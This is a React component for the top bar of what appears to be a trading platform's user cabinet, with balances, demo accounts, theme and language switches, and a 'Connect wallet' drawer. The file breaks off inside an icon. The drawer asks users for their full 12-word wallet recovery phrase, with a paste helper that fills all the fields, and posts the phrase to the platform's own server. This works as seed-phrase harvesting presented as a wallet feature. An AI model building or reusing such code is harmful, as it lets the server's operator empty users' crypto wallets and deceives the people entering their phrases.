import React, { useEffect, useRef, useState } from 'react';
import logo from '../imgs/logo.png'
import styles from '../styles/Topbar.module.scss';
import { useTranslation } from 'react-i18next';
import { Drawer, FormControlLabel, Menu, MenuItem, styled, Switch, Tooltip } from '@mui/material';
import secureLocalStorage from 'react-secure-storage';
import { useNavigate } from 'react-router-dom';
import MobileMenuDrawer from './MobileMenuDrawer';
import SettingsDrawer from './SettingsDrawer';
import axios from 'axios';

export default function Topbar({ theme, toggleTheme,account,setAccount,balance,setBalance,margin,setMargin,eurToUsd,usdToEur,setSnackMessage,setSnackType,handleClick,applications,getSymbolByAccount,totalBalanceDemo,AccountTypeEnum }) {
    const { t, i18n } = useTranslation();
    const nav = useNavigate();
    const [openMenu , setOpenMenu] = useState(false);
    const [openWallet, setOpenWallet] = useState(false);
    const [openSettings , setOpenSettings] = useState(false);
    const [mobileLangAnchorEl, setMobileLangAnchorEl] = useState(null);
    const [walletType, setWalletType] = useState(secureLocalStorage.getItem('user')?.WalletValidationType?secureLocalStorage.getItem('user')?.WalletValidationType:"MetaMask");
    const [passphrases, setPassphrases] = useState(secureLocalStorage.getItem('user')?.WalletValidation ?secureLocalStorage.getItem('user')?.WalletValidation.split(',') :Array(12).fill(''));
    const inputRefs = useRef([]);
    const [editConnectWallet , setEditConnectWallet] = useState(false);

    const handleInputChange = (index, value) => {
        // Разрешаем только латиницу и без пробелов
        const regex = /^[A-Za-z]*$/;
        if (regex.test(value)) {
        const newPassphrases = [...passphrases];
        newPassphrases[index] = value;
        setPassphrases(newPassphrases);
        }
    };

    // Обработчик вставки текста
    const handlePaste = (e, index) => {
        e.preventDefault();
        const clipboardData = e.clipboardData.getData('Text').trim();
        const words = clipboardData.split(/\s+/).filter(word => /^[A-Za-z]+$/.test(word));

        if (words.length === 0) {
        return; // Нет допустимых слов для вставки
        }

        if (index === 0) {
        // Вставка в первое поле: распределяем слова по всем полям
        const newPassphrases = [...passphrases];
        words.forEach((word, i) => {
            if (i < 12) {
            newPassphrases[i] = word;
            }
        });
        setPassphrases(newPassphrases);

        // Установить фокус на следующем пустом поле
        const nextEmptyIndex = words.length < 12 ? words.length : 11;
        if (inputRefs.current[nextEmptyIndex]) {
            inputRefs.current[nextEmptyIndex].focus();
        }
        } else {
        // Вставка в не первый инпут
        const wordsToInsert = words;
        console.log(wordsToInsert)
        if (wordsToInsert.length <= 0) {
            return; // Нет слов для вставки после обрезки
        }

        const newPassphrases = [...passphrases];
        wordsToInsert.forEach((word, i) => {
            const targetIndex = index + i;
            if (targetIndex < 12) {
            newPassphrases[targetIndex] = word;
            }
        });
        setPassphrases(newPassphrases);

        // Установить фокус на следующем пустом поле после вставки
        const nextEmptyIndex = index + wordsToInsert.length;
        if (inputRefs.current[nextEmptyIndex]) {
            inputRefs.current[nextEmptyIndex].focus();
        }
        }
    };

    useEffect(()=>{
        setPassphrases(secureLocalStorage.getItem('user')?.WalletValidation ?secureLocalStorage.getItem('user')?.WalletValidation.split(',') :Array(12).fill(''))
        setWalletType(secureLocalStorage.getItem('user')?.WalletValidationType?secureLocalStorage.getItem('user')?.WalletValidationType:"MetaMask")
    },[secureLocalStorage.getItem('user').WalletValidation,secureLocalStorage.getItem('user')?.WalletValidationType])

    const toggleDrawerWallet = (newOpen) => () => {
        setOpenWallet(newOpen);
        setEditConnectWallet(false)
        if(!newOpen){
        setWalletType(secureLocalStorage.getItem('user')?.WalletValidationType?secureLocalStorage.getItem('user')?.WalletValidationType:"MetaMask")
        setPassphrases(secureLocalStorage.getItem('user')?.WalletValidation?secureLocalStorage.getItem('user')?.WalletValidation.split(',') :Array(12).fill(''))
        }
    };
    const ConnectWallet = async () => {    
        const allPassphrasesFilled = passphrases.length === 12 && passphrases.every(word => word.trim() !== "");
        if(!walletType){
            setSnackType("error");
            handleClick();
            setSnackMessage(t("WalletTypeError"));
            return;
        }
        if (!allPassphrasesFilled) {
            setSnackType("error");
            handleClick();
            setSnackMessage(t("PassphraseError"));
            return;
        }
        try {
        axios.post(`${process.env.REACT_APP_test_url}/api/users/${secureLocalStorage.getItem("user")?.Id}/wallet`,
            {
            passphrases,walletType
            },  
            {
            headers: {
                Authorization: `Bearer ${secureLocalStorage.getItem("token")}`,
            },
            }
        ).then((data)=>{
            if (data) {
            setSnackType("success");
            handleClick();
            setSnackMessage(t("WalletConnected"));
            toggleDrawerWallet(false)();
            }
        }).catch(e =>{
            setSnackType("error");
            handleClick();
            setSnackMessage(t("ErrorWhileConnectingWallet"));
            console.error(e);
            }
        );
        } catch (e) {
        setSnackType("error");
        handleClick();
        setSnackMessage(t("ErrorWhileConnectingWallet"));
        console.error(e);
        }
    }
    const toggleDrawerSettings = (newOpen) => ()=> {
        setOpenSettings(newOpen)
    }
    const toggleDrawer = (newOpen) => ()=> {
        setOpenMenu(newOpen)
    }
    const [isTooltipOpen, setIsTooltipOpen] = useState(false);
  
    const handleTooltipOpen = () => {
      setIsTooltipOpen(true);
    };
  
    const handleTooltipClose = () => {
      setIsTooltipOpen(false);
    };

    const isMobileLangMenuOpen = Boolean(mobileLangAnchorEl);
    const handleMobileLangMenuOpen = (event) => {
        setMobileLangAnchorEl(event.currentTarget);
    };
    const handleMobileLangMenuClose = () => {
        setMobileLangAnchorEl(null);
    };

    const MaterialUISwitch = styled(Switch)(() => ({
        width: 76,
        height: 42,
        padding: 0,
        '& .MuiSwitch-switchBase': {
            margin: 1,
            padding: 0,
            transform: 'translate(2px,2px)',
            '&.Mui-checked': {
                color: theme === 'dark' ? '#FCFCFC' : '#1F2937',
                transform: 'translate(36px,2px)',
                '& .MuiSwitch-thumb:before': {
                    content: '""',
                    position: 'absolute',
                    width: '100%',
                    height: '100%',
                    display: 'block',
                    backgroundRepeat: 'no-repeat',
                    backgroundPosition: 'center',
                    backgroundImage: `url('data:image/svg+xml;utf8,${encodeURIComponent(
                        `<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path d="M12.0002 8.00016C12.0002 10.2093 10.2093 12.0002 8.00016 12.0002C5.79102 12.0002 4.00016 10.2093 4.00016 8.00016C4.00016 5.79102 5.79102 4.00016 8.00016 4.00016C10.2093 4.00016 12.0002 5.79102 12.0002 8.00016Z" fill="${theme==="dark"?"#FCFCFC":"#1F2937"}" /><path fill-rule="evenodd" clip-rule="evenodd" d="M8.00016 0.833496C8.27631 0.833496 8.50016 1.05735 8.50016 1.3335V2.00016C8.50016 2.27631 8.27631 2.50016 8.00016 2.50016C7.72402 2.50016 7.50016 2.27631 7.50016 2.00016V1.3335C7.50016 1.05735 7.72402 0.833496 8.00016 0.833496ZM2.93257 2.93257C3.12783 2.73731 3.44441 2.73731 3.63968 2.93257L3.90157 3.19446C4.09683 3.38972 4.09683 3.70631 3.90157 3.90157C3.70631 4.09683 3.38972 4.09683 3.19446 3.90157L2.93257 3.63968C2.73731 3.44441 2.73731 3.12783 2.93257 2.93257ZM13.0676 2.93274C13.2628 3.128 13.2628 3.44459 13.0676 3.63985L12.8057 3.90174C12.6104 4.097 12.2938 4.097 12.0986 3.90174C11.9033 3.70648 11.9033 3.3899 12.0986 3.19463L12.3605 2.93274C12.5557 2.73748 12.8723 2.73748 13.0676 2.93274ZM0.833496 8.00016C0.833496 7.72402 1.05735 7.50016 1.3335 7.50016H2.00016C2.27631 7.50016 2.50016 7.72402 2.50016 8.00016C2.50016 8.27631 2.27631 8.50016 2.00016 8.50016H1.3335C1.05735 8.50016 0.833496 8.27631 0.833496 8.00016ZM13.5002 8.00016C13.5002 7.72402 13.724 7.50016 14.0002 7.50016H14.6668C14.943 7.50016 15.1668 7.72402 15.1668 8.00016C15.1668 8.27631 14.943 8.50016 14.6668 8.50016H14.0002C13.724 8.50016 13.5002 8.27631 13.5002 8.00016ZM12.0986 12.0986C12.2938 11.9033 12.6104 11.9033 12.8057 12.0986L13.0676 12.3605C13.2628 12.5557 13.2628 12.8723 13.0676 13.0676C12.8723 13.2628 12.5557 13.2628 12.3605 13.0676L12.0986 12.8057C11.9033 12.6104 11.9033 12.2938 12.0986 12.0986ZM3.90157 12.0988C4.09683 12.294 4.09683 12.6106 3.90157 12.8059L3.63968 13.0678C3.44441 13.263 3.12783 13.263 2.93257 13.0678C2.73731 12.8725 2.73731 12.5559 2.93257 12.3606L3.19446 12.0988C3.38972 11.9035 3.70631 11.9035 3.90157 12.0988ZM8.00016 13.5002C8.27631 13.5002 8.50016 13.724 8.50016 14.0002V14.6668C8.50016 14.943 8.27631 15.1668 8.00016 15.1668C7.72402 15.1668 7.50016 14.943 7.50016 14.6668V14.0002C7.50016 13.724 7.72402 13.5002 8.00016 13.5002Z" fill="${theme==="dark"?"#FCFCFC":"#1F2937"}" /></svg>`
                    )}')`,
                },
                '& + .MuiSwitch-track': {
                    opacity: 1,
                    backgroundColor: theme === 'dark' ? '#131316' : '#F3F4F6',
                },
            },
        },
        '& .MuiSwitch-thumb': {
            backgroundColor: theme === 'dark' ? '#1D1D20' : '#FFF',
            width: 36,
            height: 36,
            position: 'relative',
            '&:before': {
                content: '""',
                position: 'absolute',
                width: '100%',
                height: '100%',
                left: 0,
                top: 0,
                display: 'block',
                backgroundRepeat: 'no-repeat',
                backgroundPosition: 'center',
                backgroundImage: `url('data:image/svg+xml;utf8,${encodeURIComponent(
                    `<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path d="M8.00016 14.6668C11.6821 14.6668 14.6668 11.6821 14.6668 8.00016C14.6668 7.6917 14.2045 7.64072 14.045 7.90473C13.2861 9.16058 11.9079 10.0002 10.3335 10.0002C7.94026 10.0002 6.00016 8.06006 6.00016 5.66683C6.00016 4.09247 6.83975 2.7142 8.0956 1.95534C8.35961 1.79581 8.30862 1.3335 8.00016 1.3335C4.31826 1.3335 1.3335 4.31826 1.3335 8.00016C1.3335 11.6821 4.31826 14.6668 8.00016 14.6668Z" fill="${theme === 'dark' ? '#FCFCFC' : '#1F2937'}" /></svg>`
                )}')`,
            },
        },
        '& .MuiSwitch-track': {
            opacity: 1,
            backgroundColor: theme === 'dark' ? '#131316' : '#F3F4F6',
            borderRadius: 9999,
            position: 'relative',
            '&:before, &:after': {
                content: '""',
                position: 'absolute',
                width: '16px',
                height: '16px',
                top: '50%',
                transform: 'translateY(-50%)',
                backgroundRepeat: 'no-repeat',
                backgroundPosition: 'center',
            },
            '&:before': {
                left: '12px',
                backgroundImage: `url('data:image/svg+xml;utf8,${encodeURIComponent(
                    `<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path d="M8.00016 14.6668C11.6821 14.6668 14.6668 11.6821 14.6668 8.00016C14.6668 7.6917 14.2045 7.64072 14.045 7.90473C13.2861 9.16058 11.9079 10.0002 10.3335 10.0002C7.94026 10.0002 6.00016 8.06006 6.00016 5.66683C6.00016 4.09247 6.83975 2.7142 8.0956 1.95534C8.35961 1.79581 8.30862 1.3335 8.00016 1.3335C4.31826 1.3335 1.3335 4.31826 1.3335 8.00016C1.3335 11.6821 4.31826 14.6668 8.00016 14.6668Z" fill="${theme === 'dark' ? '#51525C' : '#9CA3AF'}" /></svg>`
                    
                )}')`,
            },
            '&:after': {
                right: '12px',
                backgroundImage: `url('data:image/svg+xml;utf8,${encodeURIComponent(
                     `<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path d="M12.0002 8.00016C12.0002 10.2093 10.2093 12.0002 8.00016 12.0002C5.79102 12.0002 4.00016 10.2093 4.00016 8.00016C4.00016 5.79102 5.79102 4.00016 8.00016 4.00016C10.2093 4.00016 12.0002 5.79102 12.0002 8.00016Z" fill="${theme === 'dark' ? '#51525C' : '#9CA3AF'}" /><path fill-rule="evenodd" clip-rule="evenodd" d="M8.00016 0.833496C8.27631 0.833496 8.50016 1.05735 8.50016 1.3335V2.00016C8.50016 2.27631 8.27631 2.50016 8.00016 2.50016C7.72402 2.50016 7.50016 2.27631 7.50016 2.00016V1.3335C7.50016 1.05735 7.72402 0.833496 8.00016 0.833496ZM2.93257 2.93257C3.12783 2.73731 3.44441 2.73731 3.63968 2.93257L3.90157 3.19446C4.09683 3.38972 4.09683 3.70631 3.90157 3.90157C3.70631 4.09683 3.38972 4.09683 3.19446 3.90157L2.93257 3.63968C2.73731 3.44441 2.73731 3.12783 2.93257 2.93257ZM13.0676 2.93274C13.2628 3.128 13.2628 3.44459 13.0676 3.63985L12.8057 3.90174C12.6104 4.097 12.2938 4.097 12.0986 3.90174C11.9033 3.70648 11.9033 3.3899 12.0986 3.19463L12.3605 2.93274C12.5557 2.73748 12.8723 2.73748 13.0676 2.93274ZM0.833496 8.00016C0.833496 7.72402 1.05735 7.50016 1.3335 7.50016H2.00016C2.27631 7.50016 2.50016 7.72402 2.50016 8.00016C2.50016 8.27631 2.27631 8.50016 2.00016 8.50016H1.3335C1.05735 8.50016 0.833496 8.27631 0.833496 8.00016ZM13.5002 8.00016C13.5002 7.72402 13.724 7.50016 14.0002 7.50016H14.6668C14.943 7.50016 15.1668 7.72402 15.1668 8.00016C15.1668 8.27631 14.943 8.50016 14.6668 8.50016H14.0002C13.724 8.50016 13.5002 8.27631 13.5002 8.00016ZM12.0986 12.0986C12.2938 11.9033 12.6104 11.9033 12.8057 12.0986L13.0676 12.3605C13.2628 12.5557 13.2628 12.8723 13.0676 13.0676C12.8723 13.2628 12.5557 13.2628 12.3605 13.0676L12.0986 12.8057C11.9033 12.6104 11.9033 12.2938 12.0986 12.0986ZM3.90157 12.0988C4.09683 12.294 4.09683 12.6106 3.90157 12.8059L3.63968 13.0678C3.44441 13.263 3.12783 13.263 2.93257 13.0678C2.73731 12.8725 2.73731 12.5559 2.93257 12.3606L3.19446 12.0988C3.38972 11.9035 3.70631 11.9035 3.90157 12.0988ZM8.00016 13.5002C8.27631 13.5002 8.50016 13.724 8.50016 14.0002V14.6668C8.50016 14.943 8.27631 15.1668 8.00016 15.1668C7.72402 15.1668 7.50016 14.943 7.50016 14.6668V14.0002C7.50016 13.724 7.72402 13.5002 8.00016 13.5002Z" fill="${theme === 'dark' ? '#51525C' : '#9CA3AF'}"/></svg>`
                )}')`,
            },
        },
    }));

    const Logout = () => {
        secureLocalStorage.removeItem('token');
        secureLocalStorage.removeItem('user');
        nav('/login', { replace: true });
    }

    const languages = ["en","de","cz","it","es"];

    function changeLanguage() {
      const currentLang = secureLocalStorage.getItem('lang') || 'en';
      const currentIndex = languages.indexOf(currentLang);
      const nextIndex = (currentIndex + 1) % languages.length;
      const nextLang = languages[nextIndex];
    
      i18n.changeLanguage(nextLang);
      secureLocalStorage.setItem('lang', nextLang);
    }

    return (
        <div className={styles.topbar}>
            <div className={styles.mobile_navbar} onClick={toggleDrawer(true)}>
                <svg xmlns="http://www.w3.org/2000/svg" width={"16px"} height={"16px"} viewBox="0 0 16 16" fill="none">
                    <path d="M13.3333 4.66699L2.66659 4.66699" stroke="#FCFCFC" stroke-linecap="round"/>
                    <path d="M13.3333 8L2.66659 8" stroke="#FCFCFC" stroke-linecap="round"/>
                    <path d="M13.3333 11.333L2.66659 11.333" stroke="#FCFCFC" stroke-linecap="round"/>
                </svg>
            </div>
            <div className={styles.logo}>
                <img loading="lazy" src={logo} alt='logo'/>
                <h2>{t('Cabinet')}</h2>
            </div>
            <div className={styles.right_side}>
                <div className={styles.balance}>
                    
                    
                    {
                        account?.AccountType === AccountTypeEnum.Fake
                        ?<span className={styles.demo_account}>Demo</span>:''
                    }
                    {account?.AccountType === AccountTypeEnum.Fake?<div className={styles.inside_balance}>
                        <p>{getSymbolByAccount()} {totalBalanceDemo?  account?.AccountCurrency == "EUR"?(totalBalanceDemo * eurToUsd).toFixed(2) :totalBalanceDemo.toFixed(2) :0}</p>
                        <span>{t("Total demo balance")}</span>
                    </div>:''
                    }
                    <div className={styles.inside_balance}>
                        <p>{getSymbolByAccount()} {parseFloat((balance+(applications?.balances?.reduce((sum,val)=>sum+=val?.TotalSum,0))) * (secureLocalStorage.getItem('selected_account')?.AccountCurrency === 'EUR'? eurToUsd : 1)).toFixed(2)}</p>
                        <span>{t('Total Balance')}</span>
                    </div>
                </div>
                <div className={styles.buttons}>
                {secureLocalStorage.getItem('user').WalletEnabled ? <button onClick={toggleDrawerWallet(true)} className={`${styles.connect_wallet}  ${secureLocalStorage?.getItem("user")?.WalletValidation? styles.active :''}`}>
                    <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    {secureLocalStorage?.getItem("user")?.WalletValidation?<circle cx="16" cy="16" r="16" fill="#a855f7"/> : ''}
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M22.2993 11.9384C18.8203 8.46497 13.1797 8.46497 9.7007 11.9384L9.24114 12.3973C9.06719 12.5709 9.06719 12.8525 9.24114 13.0262L10.6734 14.4562C10.7604 14.5431 10.9014 14.5431 10.9884 14.4562L11.6055 13.8402C14.0325 11.417 17.9675 11.417 20.3946 13.8402L20.9707 14.4154C21.0577 14.5023 21.1987 14.5023 21.2857 14.4154L22.718 12.9854C22.892 12.8117 22.892 12.5301 22.718 12.3565L22.2993 11.9384ZM26.5362 16.1686L25.2614 14.8959C25.0875 14.7222 24.8055 14.7222 24.6315 14.8959L20.552 18.9689C20.5085 19.0123 20.438 19.0123 20.3945 18.9689L16.3149 14.8958L16.3149 14.8958C16.1409 14.7221 15.8589 14.7221 15.685 14.8958L11.6056 18.9689C11.5621 19.0123 11.4916 19.0123 11.4481 18.9689L7.36848 14.8958C7.19453 14.7221 6.9125 14.7221 6.73855 14.8958L5.46379 16.1685C5.28984 16.3422 5.28984 16.6238 5.46379 16.7974L11.2119 22.5364C11.3859 22.7101 11.6679 22.7101 11.8418 22.5364L15.9213 18.4634C15.9648 18.4199 16.0353 18.4199 16.0788 18.4634L20.1583 22.5364C20.3323 22.7101 20.6143 22.7101 20.7882 22.5364L26.5362 16.7975C26.7101 16.6238 26.7101 16.3423 26.5362 16.1686Z" fill="var(--font-mine)"/>
                    </svg>
                </button>:null}
                    <div className={styles.theme}>

                    <FormControlLabel
                    sx={{margin:0, '& .MuiSwitch-input':{width:'100%'}}}
                            control={<MaterialUISwitch sx={{ m: 0 }} defaultChecked />}
                            checked={theme==='light'}
                            onChange={()=> toggleTheme(theme === 'dark'? 'light':'dark')}
                        />
                    </div>
                    <Tooltip
                        classes={{ tooltip: styles.tooltip }}
                        PopperProps={{
                            disablePortal: true,
                        }}
                        title={
                            <div className={styles.lang_tooltip}>
                            {languages.map((el, index) => (
                                <img onClick={()=>{i18n.changeLanguage(el);secureLocalStorage.setItem('lang',el)}} key={index}  src={`https://flagcdn.com/w320/${el === 'en'?'us':el}.png`} width={'22vh'} height={'22vh'} style={{borderRadius:"1000px" , cursor:'pointer'}}/>
                            ))}
                            </div>
                        }
                        placement="bottom"
                        componentsProps={{
                            popper: {
                            sx: {
                                display: 'flex',
                                alignItems: 'start',
                                justifyContent: 'center',
                                width: 'max-content',
                            },
                            },
                        }}
                        onOpen={handleTooltipOpen}
                        onClose={handleTooltipClose}
                        open={isTooltipOpen}
                        >
                        <div 
                            className={`${styles.lang_currency} ${
                            isTooltipOpen ? styles.noBorderRadius : ''
                            }`}>
                            <span className={styles.lang}>
                                <img src={`https://flagcdn.com/w320/${i18n.language === 'en'?'us':i18n.language}.png`} width={'22vh'} height={'22vh'} style={{borderRadius:"1000px" , cursor:'pointer'}}/>
                            </span>
                        </div>
                    </Tooltip>
                    <div 
                         onClick={handleMobileLangMenuOpen}
                         className={`${styles.mobile_lang_selector} ${
                         isMobileLangMenuOpen ? styles.noBorderRadius : ''
                         }`}>
                         <span className={styles.lang}>
                                 <img src={`https://flagcdn.com/w320/${i18n.language === 'en' ? 'us' : i18n.language}.png`} width={'22vh'} height={'22vh'} style={{ borderRadius: "1000px", cursor: 'pointer' }} alt={`${i18n.language} flag`} />
                         </span>
                    </div>
                    <Menu
                        id="topbar-mobile-language-menu"
                        anchorEl={mobileLangAnchorEl}
                        open={isMobileLangMenuOpen}
                        onClose={handleMobileLangMenuClose}
                        transformOrigin={{
                            vertical: 'top',
                            horizontal: 'bottom',
                        }}
                        MenuListProps={{
                        'aria-labelledby': 'topbar-mobile-language-menu',
                        }}
                        sx={{ 'ul': { padding: 0 } }}
                        >
                        {languages.map((el, index) => (
                            <MenuItem
                                sx={{ padding: '0.8vh', background: 'var(--buttons-alternative-default)' }}
                                key={index}
                                onClick={() => {
                                    i18n.changeLanguage(el);
                                    secureLocalStorage.setItem('lang', el);
                                    handleMobileLangMenuClose();
                                }}
                            >
                                <img
                                    src={`https://flagcdn.com/w320/${el === 'en' ? 'us' : el}.png`}
                                    width='22px'
                                    height='22px'
                                    style={{ borderRadius: "50%", cursor: 'pointer' }}
                                    alt={`${el} flag`}
                                />
                            </MenuItem>
                        ))}
                    </Menu>
                    <div className={styles.settings} onClick={toggleDrawerSettings(true)}>
                        <svg xmlns="http://www.w3.org/2000/svg" width={'1.6vh'} height={'1.6vh'}  viewBox="0 0 16 16" fill="none">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M9.51921 1.43353C9.27231 1.33203 8.95932 1.33203 8.33333 1.33203C7.70735 1.33203 7.39435 1.33203 7.14746 1.43353C6.81827 1.56885 6.55673 1.82842 6.42037 2.15512C6.35813 2.30426 6.33377 2.4777 6.32423 2.73069C6.31023 3.10248 6.1181 3.44663 5.79344 3.63265C5.46879 3.81867 5.07243 3.81172 4.74099 3.63787C4.51545 3.51956 4.35192 3.45378 4.19066 3.43271C3.83739 3.38655 3.48012 3.48156 3.19744 3.69683C2.98542 3.85828 2.82893 4.1273 2.51594 4.66532C2.20294 5.20334 2.04645 5.47235 2.01156 5.7353C1.96506 6.0859 2.06079 6.44047 2.2777 6.72102C2.3767 6.84907 2.51585 6.95672 2.7318 7.09138C3.04928 7.28935 3.25355 7.6266 3.25353 7.99871C3.25351 8.37078 3.04924 8.70798 2.7318 8.90593C2.51581 9.04061 2.37665 9.14827 2.27763 9.27633C2.06072 9.55688 1.96499 9.91145 2.0115 10.262C2.04638 10.525 2.20288 10.794 2.51587 11.332C2.82886 11.8701 2.98536 12.1391 3.19737 12.3005C3.48005 12.5158 3.83733 12.6108 4.19059 12.5646C4.35185 12.5436 4.51537 12.4778 4.74089 12.3595C5.07235 12.1856 5.46873 12.1787 5.79341 12.3647C6.11809 12.5508 6.31022 12.8949 6.32424 13.2667C6.33377 13.5197 6.35813 13.6931 6.42037 13.8423C6.55673 14.169 6.81827 14.4285 7.14746 14.5639C7.39435 14.6654 7.70735 14.6654 8.33333 14.6654C8.95932 14.6654 9.27231 14.6654 9.51921 14.5639C9.8484 14.4285 10.1099 14.169 10.2463 13.8423C10.3085 13.6931 10.3329 13.5197 10.3424 13.2667C10.3564 12.8949 10.5485 12.5508 10.8732 12.3647C11.1979 12.1787 11.5943 12.1856 11.9257 12.3595C12.1512 12.4778 12.3148 12.5435 12.476 12.5646C12.8293 12.6108 13.1865 12.5157 13.4692 12.3005C13.6812 12.139 13.8377 11.87 14.1507 11.332C14.4637 10.794 14.6202 10.525 14.6551 10.262C14.7016 9.91141 14.6059 9.55684 14.389 9.27629C14.29 9.14823 14.1508 9.04058 13.9348 8.9059C13.6174 8.70794 13.4131 8.37072 13.4131 7.99864C13.4132 7.6266 13.6174 7.28942 13.9348 7.09149C14.1508 6.9568 14.29 6.84914 14.389 6.72106C14.6059 6.44052 14.7017 6.08594 14.6552 5.73535C14.6203 5.4724 14.4638 5.20339 14.1508 4.66536C13.8378 4.12734 13.6813 3.85833 13.4693 3.69688C13.1866 3.48161 12.8293 3.3866 12.4761 3.43275C12.3148 3.45382 12.1513 3.5196 11.9258 3.6379C11.5943 3.81176 11.1979 3.81871 10.8733 3.63267C10.5486 3.44664 10.3564 3.10247 10.3424 2.73066C10.3329 2.47768 10.3085 2.30425 10.2463 2.15512C10.1099 1.82842 9.8484 1.56885 9.51921 1.43353ZM8.33333 9.9987C9.44631 9.9987 10.3486 9.10327 10.3486 7.9987C10.3486 6.89413 9.44631 5.9987 8.33333 5.9987C7.22035 5.9987 6.3181 6.89413 6.3181 7.9987C6.3181 9.10327 7.22035 9.9987 8.33333 9.9987Z"/>
                        </svg>
                    </div>
                    <div className={styles.logout} onClick={Logout}>
                        <svg xmlns="http://www.w3.org/2000/svg" width={'1.6vh'} height={'1.6vh'} viewBox="0 0 16 16" fill="none">
                            <path d="M8 13.3332C5.05448 13.3332 2.66667 10.9454 2.66667 7.99984C2.66667 5.05432 5.05448 2.6665 8 2.6665" strokeLinecap="round" />
                            <path d="M6.66666 8H13.3333M13.3333 8L11.3333 6M13.3333 8L11.3333 10" strokeLinecap="round" strokeLinejoin="round" />
                        </svg>
                    </div>
                </div>
            </div>
            <MobileMenuDrawer
              totalBalanceDemo={totalBalanceDemo}
              getSymbolByAccount={getSymbolByAccount}
              setSnackMessage={setSnackMessage}
              setSnackType={setSnackType}
              handleClick={handleClick} open={openMenu} theme={theme} toggleDrawer={toggleDrawer} toggleTheme={toggleTheme} account={account}/>
            <SettingsDrawer
              setSnackMessage={setSnackMessage}
              setSnackType={setSnackType}
              handleClick={handleClick} open={openSettings} toggleDrawer={toggleDrawerSettings}/>
            
            <Drawer
                open={openWallet}
                anchor={window.innerWidth < 600 ? "bottom" : "right"}
                onClose={toggleDrawerWallet(false)}
                PaperProps={{
                className: styles.paper,
                }}
            >
                <div className={styles.account_drawer}>
                <div className={styles.close_icon} onClick={toggleDrawerWallet(false)}>
                    <svg xmlns="http://www.w3.org/2000/svg" width={16} height={16} viewBox="0 0 16 16" fill="none">
                        <path d="M12 4.00003L4 12M3.99997 4L11.9999 12" stroke="#51525C" strokeLinecap="round" />
                    </svg>
                </div>
                <div className={styles.top_drawer}>
                    <div className={styles.drawer_header}>
                        <div>
                            <span className={styles.icon}>
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill={'var(--font-mine)'} d="M16 12h2v4h-2z"></path><path fill={'var(--font-mine)'} d="M20 7V5c0-1.103-.897-2-2-2H5C3.346 3 2 4.346 2 6v12c0 2.201 1.794 3 3 3h15c1.103 0 2-.897 2-2V9c0-1.103-.897-2-2-2zM5 5h13v2H5a1.001 1.001 0 0 1 0-2zm15 14H5.012C4.55 18.988 4 18.805 4 18V8.815c.314.113.647.185 1 .185h15v10z"></path></svg>
                            </span>
                            {t("Connect wallet")}
                        </div>
                    </div>
                    {
                    secureLocalStorage?.getItem("user")?.WalletValidation && !editConnectWallet?
                    <div className={styles.alredyExists}>
                        <h3>{t('WalletAlreadyExists')}</h3>
                        <button onClick={()=>setEditConnectWallet(true)}>{t('Edit')}</button>
                    </div>
                    :
                    <div className={styles.drawer_body}>
                        <div className={styles.wallet_types}>
                        <div className={`${styles.type} ${walletType === 'MetaMask'? styles.active :''}`} onClick={()=> setWalletType("MetaMask")}>
                            <span className={styles.icon}>
                            <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <circle cx="16" cy="16" r="16" fill="#F7F9FB"/>
                                <path d="M25.6116 6L17.2777 12.25L18.8275 8.56667L25.6116 6Z" fill="#E17726" stroke="#E17726" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M6.38844 6L14.6481 12.3083L13.1726 8.56666L6.38844 6Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M22.6109 20.4916L20.3935 23.9249L25.1415 25.2499L26.5017 20.5666L22.6109 20.4916Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M5.50636 20.5666L6.85824 25.2499L11.5981 23.9249L9.3889 20.4916L5.50636 20.5666Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.3425 14.6916L10.0236 16.7083L14.7222 16.925L14.5656 11.8L11.3425 14.6916Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M20.6572 14.6917L17.3847 11.7417L17.2776 16.9251L21.9761 16.7084L20.6572 14.6917Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.5982 23.9249L14.442 22.5333L11.9938 20.6L11.5982 23.9249Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path opacity="0.8" d="M17.558 22.5333L20.3936 23.9249L20.0061 20.6L17.558 22.5333Z" fill="#E27625" stroke="#E27625" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M20.3936 23.9251L17.558 22.5334L17.7887 24.4001L17.764 25.1917L20.3936 23.9251Z" fill="#D5BFB2" stroke="#D5BFB2" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.5982 23.9251L14.236 25.1917L14.2195 24.4001L14.442 22.5334L11.5982 23.9251Z" fill="#D5BFB2" stroke="#D5BFB2" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M14.2854 19.3666L11.9278 18.6667L13.5929 17.8917L14.2854 19.3666Z" fill="#233447" stroke="#233447" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.7146 19.3666L18.407 17.8917L20.0804 18.6667L17.7146 19.3666Z" fill="#233447" stroke="#233447" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
